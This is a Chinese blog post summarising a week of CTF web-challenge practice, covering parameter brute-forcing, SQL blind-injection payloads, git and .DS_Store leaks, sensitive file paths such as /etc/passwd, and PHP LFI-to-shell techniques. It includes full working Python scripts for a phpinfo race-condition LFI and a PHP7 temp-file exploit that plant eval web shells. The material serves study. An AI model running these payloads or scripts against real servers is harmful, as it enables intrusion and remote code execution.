2023 10月8日 至 10 月16日学习总结

已于 2023-10-21 10:31:03 修改
阅读量4.8k 收藏
点赞数
分类专栏: 周总结 文章标签: 学习
于 2023-10-21 10:30:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133957424
版权

1.做的题目

[RootersCTF2019]I_<3_Flask_双层小牛堡的博客-CSDN博客

[NCTF2019]SQLi regexp 盲注-CSDN博客

[网鼎杯 2018]Comment git泄露 / 恢复 二次注入 .DS_Store bash_history文件查看-CSDN博客

PHP LFI 利用临时文件Getshell_双层小牛堡的博客-CSDN博客

[NPUCTF2020]ezinclude 文件包含两大 getshell方式-CSDN博客

Bugku sql注入 基于布尔的SQL盲注 经典题where information过滤-CSDN博客

2.知识点

参数爆破

首先就是对网站进行基本的信息收集 但是备份,扫描,抓包

都没有效果的时候可以进行参数爆破

通过工具 arjun可以爆破

arjun -u url  -m GET  -c 100 -d 5

这里是通过慢速 来实现爆破 100个一组 延迟时间为 5

SQL正则盲注  regexp

sql题一般我先进行fuzz 然后进行测试注入

这里给出一个知识点

转义符 \ 构造闭合

select * from username = '\' and password = '';

这里的 '\' 可以让 username 绕过 因为我们的注入点是在password上

这里解释一下 转义符这里没有过滤 所以我们可以rang \' 变为'


select * from username = '\' and password = '#'

这个时候 字符串 ' and password  就被外面两个 ' 闭合了

所以我们构造 ||1 就可以变为


'\' and password = '||1#'

这里大家直接去phpmyadmin尝试即可

绕过空格

/**/ 或者 %09

都可以

正则盲注

这里放出了正则和 ^

原理是

假设我的表名为admin

select * from username = '\' and password = ' || password regexp "^a"


后面的 "^a"  是开头为 a 的就返回 true 所以我们可以进行盲注

这里还需要00截断后面的引号

但是我们盲注需要通过python 所以这里也介绍一下python的库

python库

首先是 string

这里我们就不需要指定 37-128

直接通过这个库就可以将可打印的字符输出

然后就是-00截断的库

from urllib import parse

这个库是url编码


a = parse.unquote('%00')

这里就是post的url编码后的00截断

GIT泄露

首先通过扫描可以发现存在git泄露

然后通过工具实现

https://gitcode.net/mirrors/BugScanTeam/GitHack?utm_source=csdn_github_accelerator

然后发现存在的代码是出错的

这里就可以通过 .git文件来恢复数据

GIT数据恢复

首先查看日志


git log -all

然后通过指定就可以恢复成以前的代码


git reset --hard 字符

二次注入的危险函数

addslashes 将输入转变为字符串 原封不动存入数据库

这里的注入闭合 文章里面写的比较详细了 大家去看就可以了

任意文件读取

做这个题的时候 知道任意文件读取是高危 但是确实不知道去看什么比较好

/proc/self/environ
/proc/self/cmdline

/etc/passwd 查看存在的用户

/home/用户/.bash_history 查看该用户的历史命令

 .DS_Store泄露

获取内容了 因为 .DS_Store 存在很多不可见字符

所以我们可以通过hex输出 然后通过瑞士军刀 解密 并且作为文件输出

然后通过工具Python-dsstore-master

来解密获取

PHP LFI getshell

这里确实学到了很多东西

这里的前提都是存在文件包含

存在phpinfo()

如果存在phpinfo界面 我们通过对phpinfo不断发送垃圾包 其中的内容中包含着木马

这个时候我们上传的临时文件就会保存在 临时文件目录下

并且通过linux和win的命名规则存储

我们只需要去包含 就会生成木马

这里只需要通过条件竞争即可

#!/usr/bin/python3
import sys
import threading
import socket
 
 
def setup(host, port):
    TAG = "安全测试"
    PAYLOAD = """%s\r
<?php file_put_contents('/tmp/shell', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG
    REQ1_DATA = """-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
    padding = "A" * 5000
    REQ1 = """POST /phpinfo.php?a=""" + padding + """ HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=""" + padding + """\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """ + padding + """\r
HTTP_ACCEPT_LANGUAGE: """ + padding + """\r
HTTP_PRAGMA: """ + padding + """\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" % (len(REQ1_DATA), host, REQ1_DATA)
    # modify this to suit the LFI script
    LFIREQ = """GET /lfi.php?file=%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
    return (REQ1, TAG, LFIREQ)
 
 
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
    s.connect((host, port))
    s2.connect((host, port))
 
    s.send(phpinforeq.encode())
    d = b""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index(b"[tmp_name] =&gt; ")
        fn = d[i + 17:i + 31]
    except ValueError:
        return None
 
    s2.send((lfireq % (fn.decode(), host)).encode())
    d = s2.recv(4096)
    s.close()
    s2.close()
 
    if d.find(tag.encode()) != -1:
        return fn.decode()
 
 
counter = 0
 
 
class ThreadWorker(threading.Thread):
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock = l
        self.maxattempts = m
        self.args = args
 
    def run(self):
        global counter
        while not self.event.is_set():
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter += 1
 
            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break
                if x:
                    print("\n成功!Shell已创建在 /tmp/shell")
                    self.event.set()
 
            except socket.error:
                return
 
 
def getOffset(host, port, phpinforeq):
    """获取php输出中tmp_name的偏移量"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(phpinforeq.encode())
 
    d = b""
    while True:
        i = s.recv(4096)
        d += i
        if i == b"":
            break
        # detect the final chunk
        if i.endswith(b"0\r\n\r\n"):
            break
    s.close()
    i = d.find(b"[tmp_name] =&gt; ")
    if i == -1:
        raise ValueError("在phpinfo输出中未找到php tmp_name")
 
    print("在位置 %i 找到 %s" % (i, d[i:i + 10].decode()))
    # 加一些填充
    return i + 256
 
 
def main():
    print("LFI With PHPInfo()")
    print("-=" * 30)
 
    if len(sys.argv) < 2:
        print("用法:%s 主机 [端口] [线程数]" % sys.argv[0])
        sys.exit(1)
 
    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error as e:
        print("主机名 %s 无效,请确保输入正确的主机名或IP地址。" % sys.argv[1])
        host = socket.gethostbyname(sys.argv[1])
    except socket.error as e:
        print("主机名 %s 无效,请确保输入正确的主机名或IP地址。" % sys.argv[1])
        sys.exit(1)
 
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    numthreads = int(sys.argv[3]) if len(sys.argv) > 3 else 10
 
    phpinforeq, tag, lfireq = setup(host, port)
    offset = getOffset(host, port, phpinforeq)
 
    print("\n[*] 开始进行LFI攻击...")
    threads = []
    e = threading.Event()
    l = threading.Lock()
 
    try:
        for i in range(numthreads):
            t = ThreadWorker(e, l, 100, host, port, phpinforeq, offset, lfireq, tag)
            threads.append(t)
            t.start()
 
        while not e.is_set():
            try:
                e.wait(1)
            except KeyboardInterrupt:
                print("\n[*] 收到中断信号,正在停止攻击...")
                e.set()
 
    except socket.error as e:
        print("连接错误:%s" % str(e))
 
    for t in threads:
        t.join()
 
    print("\n[*] 攻击结束。")
 
 
if __name__ == "__main__":
    main()

大家还是读读上面代码 也能学到内容

PHP7 Segment Falut

首先是 php7 的一个漏洞

通过特定伪协议包含文件会发生段错误 这个时候上传的文件会保存在临时文件下 并且不会被删除


php://filter/sring.strip_tags
存在dir类型的页面

我们只需要去包含里面的漏洞文件即可

不存在dir类型页面

通过爆破实现即可

下面是存在dir页面的时候的脚本

# -*- coding: utf-8 -*-
import re
import requests
from io import BytesIO
 
# 定义漏洞URL和文件路径
vul_url = "http://localhost/index.php?file=php://filter/string.strip_tags/resource=C:/Windows/win.ini"
url2 = "http://localhost/dir.php"
 
# 构建文件
files = {'file': BytesIO('<?php eval($_REQUEST[1]);?>')}
 
# 发送漏洞利用请求
req = requests.post(url=vul_url, files=files, allow_redirects=False)
req2 = requests.get(url=url2)
# 获取临时文件名
content1 = re.search(r"php[a-zA-Z0-9]{1,}.tmp", req2.content).group(0)
 
# 构建获取目录列表的URL
url3 = "http://localhost/index.php?file=C:/Windows/{}".format(content1)
 
# 构建命令
data = {
    1: "system('dir');"
}
 
# 发送获取目录列表的请求
req3 = requests.post(url=url3, data=data)
 
# 输出结果
print u"目录列表:\n{}".format(req3.text)

SESSION LIF getshell

HAVE SESSION

一样 需要存在文件包含漏洞

这里是通过session 用户会话getshell

首先我们发送存在session的包的时候 会在session存储位置保存着session文件

取名是为 sess_输入

Cookie: PHPSESSID=输入

一般处理会话 要么是通过 原始输入 要么就是通过序列化输入

如果不对用户会话文件进行处理 那么我们只需要写入一句话即可

如果对用户会话进行base64加密 那么我们只需要 构造 4个字符一组的方式 解密即可

记住要过滤掉特殊字符

NO SESSION

当session没有开启的时候

我们可以通过php的特性 文件上传的时候

传递

session.upload_progress.name:<?php phpinfo();?>

这个内容是可控的 并且原本文件上传就存在 如果还发送一次 就开启session 并且存入临时文件

 这里的流程图为

文件上传 --->设置session -----> 传递session.upload_progress.name 造成session开启 存入内容

这里去看原本的文章更加详细

SQL过滤许多的盲注

这道题确实过滤了巨多东西

这里的知识点

方法一

select substr('flag',1)---->flag

select substr('flag',2)---->lag

然后我们只需要两次substr 并且倒装输出即可

select reverse(substr('flag',1)) ---->galf

select substr(reverse(substr('flag',1)),4)----->f


select substr(reverse(substr('flag',1)),3)----->fl

然后盲注过滤了 = 号  我们可以通过 <> 不等号实现

1 <> 1 返回false

1 <> 2 返回 true

因为过滤了查询列名和表名的系统库 所以这里直接通过 字典爆破即可

方法二

通过 减去 来实现

a'or((ascii(substr((select(password))from(1)))-48))--

这里也是因为 过滤了 = 号

这里也推荐大家去看上面文章 写的详细 这里只是简单的记录

3.不足

这些题 混在一起 我就有点没想到 git那种题目的确实很简单 但是确实也是没有想到

4.下一周计划

专心准备比赛

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Safari浏览器 - 2022年816 10:13.pdf
08-16
Safari浏览器 - 2022年816 10:13.pdf
青龙脚本库总结(不定期更新版)1012
qq_39221949的博客
05-12 2万+
不定期更新版 我使用的
语 数字 时间 星期 读法总结
Steve Wang's blog
01-22 4119
数字读法 注:语数字写法完全等同于汉字,只是读音不同。比如十二就写作十二,读作じゅうに。 100以下 小数 分数 数字 读法 0 れい、ぜろ 1 いち 2 に 3 さん 4 し、よん(よ) 5 ご 6 ろく 7 しち、なな 8 はち 9 く、きゅう 10 じゅう 11 じゅういち 12 じゅうに 13 じゅうさん 14 じゅうし、じゅうよん 15 じゅうご 16 じゅうろく 17 じゅうしち、じゅうなな 18 じゅう
【愚公系列】202310 Java教学课程 063-字符集
热门推荐
时光隧道
01-08 3万+
常见的字符集有以下几种:ASCII码:全称美国信息交换标准代码,是用来表示英文字符和控制字符的常用字符编码方法。ASCII码标准规定了128个字符的编码,包括英文字母、数字、标点符号和一些控制字符。Unicode:是一种字符集,可以表示世界上所有的文字,包括中文、文、韩文、阿拉伯文等不同语言的字符。Unicode采用16位或32位的编码方式,可以覆盖大部分世界上的字符,它是国际组织ISO制定的标准。GB2312:是一种针对中文字符的字符集,是中国国家标准,用于表示汉字和部分符号。
2023年终总结|回顾学习Tensorflow、Keras的历程
lymake的博客
12-31 1959
2023年终总结|回顾学习Tensorflow、Keras的历程
程序猿学习笔记~2020年1027(编码和乱码)
qq_41424688的博客
10-28 2万+
Java学习记~2020年1027        i
台电tbook10s官方固件_【111】台电官方系统固件更新
weixin_42548961的博客
01-13 6318
论坛固件下载:http://t.cn/RVeQzkc一、TbooK 10 S (E6N9)-双系统(Android5.1+Win10)版本:V1.01_20160929 (android 5.1) & 20160831版(Win10_RS1)改善内容:首版本发布;二、TbooK 16 Pro (E5C9)-双系统(Android5.1+Win10)版本:V1.01_20161012 (an...
“华为云电脑”8 16 将停止服务和运营
weixin_39787242的博客
07-22 8629
本文转载自IT之家 IT之家7 21 消息 华为官方宣布,“华为云电脑”App 将于北京时间 2021 年 8 15 23 点 59 分停止服务和运营,自那之后用户将再无法登录和使用。 尊敬的用户: 因业务发展策略调整,“华为云电脑”将于北京时间 2021 年 8 15 23 点 59 分停止服务和运营,届时及以后您将无法登录和使用。在此之前,有效套餐仍可连接使用,请您务必及时转存云电脑中的所有数据,停服后您的数据将被永久删除,不可恢复。 我们建议您在 2021 年 8 ..
王者服务器12维护,1228周版本更新维护内容公告
weixin_30013029的博客
08-09 4261
亲爱的谕霸们:本周维护时间为1228上午8:00-10:00。本次更新后游戏版本号为1.0.280.系统玩法优化1.【重点活动】相关调整:极地之誓,英灵相伴,【天空之誓】新资料片活动火热进行中!超多活动奖励等你来拿哦!详情点击>>元旦将至,鸟叔来给大家送礼啦!1231晚上20:00-22:00游戏内在线即可在精品活动界面领取鸟叔雪夜礼,有几率获得稀有英灵羽哦!周版本更新礼包在积...
WIN10安装CUDA保姆级教程[2023.5.7更新]
ZHUO__zhuo的博客
05-07 2万+
不要选Visual Studio Integration,即使选了也不能成功安装。记住以下安装位置,tensorflow要求配置环境重点提醒:一定要记住这个路径,把这个路径保留下来,后面我们还会用到!!!安装完成后,鼠标右键此电脑->属性->高级系统设置->环境变量,查看系统变量即可看到红色框选的两项。或者直接在电脑搜索编辑系统环境变量打开。查看系统变量中是否添加了路径,如果没有需要自己添加。
【历史上的今天】10 5 :Linux 内核正式面世;乔布斯逝世;谷歌发布 Android 6.0
历史上的今天
10-05 9556
透过「历史上的今天」,从过去看未来,从现在亦可以改变未来。
程序设计1081
08-08
A.4 B.8 C.16 D.32 第四代计算机的主要逻辑元件采用的是A.晶体管 B. 小规模集成电路 C.电子管 D.大规模和超大规模集成电路计算
XX项目运营BD开展情况汇总(58-1016)《老付说运营》.xlsx
09-15
XX项目运营BD开展情况汇总(58-1016)《老付说运营》.xlsx
8uftp 最新版本 1016更新
10-17
用于ftp传输,是一款极好的、简洁的ftp工具。站长必备!wapmake.com
极客班C++面向对象高级编程测试题2(816)1
08-03
使用一个循环,生成 10 个 Rectangle、10 个 Circle,根据循环遍历顺序为它们设置 no 编号,位置、长、宽、半径等其他信息取随机 1~10
FME学习之旅---day27
最新发布
summer_corner的博客
05-17 201
我们付出一些成本,时间的或者其他,最终总能收获一些什么。
使用多实例学习进行乳腺癌组织病理学图像分类和定位
qq_47896523的博客
05-16 1105
乳腺癌是女性最主要的死亡原因,病理学家根据病理切片中观察到的各种视觉特征(例如细胞核的形态特征、细胞核的微观和宏观结构等)做出决定。计算机辅助诊断(CAD)系统可以帮助病理学家自动做出决策。卷积神经网络是最广泛使用的深度学习框架,用于学习图像类别之间的复杂判别特征。多年来,VGG16 [3] 和 ResNet18 [4] 等各种 CNN 架构在海量 ImageNet 数据集上产生了出色的结果。CNN 被用于医学图像以产生最先进的结果。为图像中存在的所有类别提供了定位信息。
WEB转Flutter基础学习笔记(内含vue和flutter对比)
小易不止于搬砖的博客
05-17 681
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
Page对象的学习
2301_77523055的博客
05-14 1007
ASP.NET允许开发者创建自定义控件和用户控件来扩展页面的功能。自定义控件是从现有的ASP.NET控件派生出来的新控件,而用户控件则是将多个控件组合成一个可重用的单元。这些控件可以像其他ASP.NET控件一样在页面上使用,并通过Page对象进行交互。Page_Init主要用于在控件加载之前进行初始化设置和添加事件处理程序。Page_Load主要用于处理页面回发和加载数据,以及执行其他需要在页面加载时完成的逻辑。由于Page_Init在Page_Load之前触发,因此在Page_Init。
列举从2001年开始,每年农历812对应的阳历期。
02-26
- 2003年: 108 - 2004年: 927 - 2005年: 916 - 2006年: 105 - 2007年: 925 - 2008年: 913 - 2009年: 102 - 2010年: 921 - 2011年: 910 - 2012年: 928 - 2013年:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值